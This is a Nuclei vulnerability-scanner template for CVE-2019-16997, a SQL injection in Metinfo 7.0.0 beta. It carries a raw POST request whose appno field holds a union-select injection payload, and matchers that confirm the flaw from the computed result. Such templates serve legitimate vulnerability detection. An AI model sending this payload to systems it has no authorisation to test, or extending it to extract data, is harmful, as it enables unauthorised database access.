nuclei-templates/cves/2019/CVE-2019-16997.yaml

41 lines
1.1 KiB
YAML

id: CVE-2019-16997
info:
name: Metinfo 7.0.0 beta - SQL Injection
author: ritikchaddha
severity: high
description: Metinfo 7.0.0 beta is susceptible to SQL Injection in app/system/language/admin/language_general.class.php via the admin/?n=language&c=language_general&a=doExportPack appno parameter.
reference:
- https://github.com/XiaOkuoAi/XiaOkuoAi.github.io/issues/2
- https://nvd.nist.gov/vuln/detail/CVE-2019-16997
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2019-16997
cwe-id: CWE-89
tags: metinfo,sqli,cve,cve2019
requests:
- raw:
- |
POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
appno= 1 union SELECT 98989*443131,1&editor=cn&site=web
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "43865094559"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/14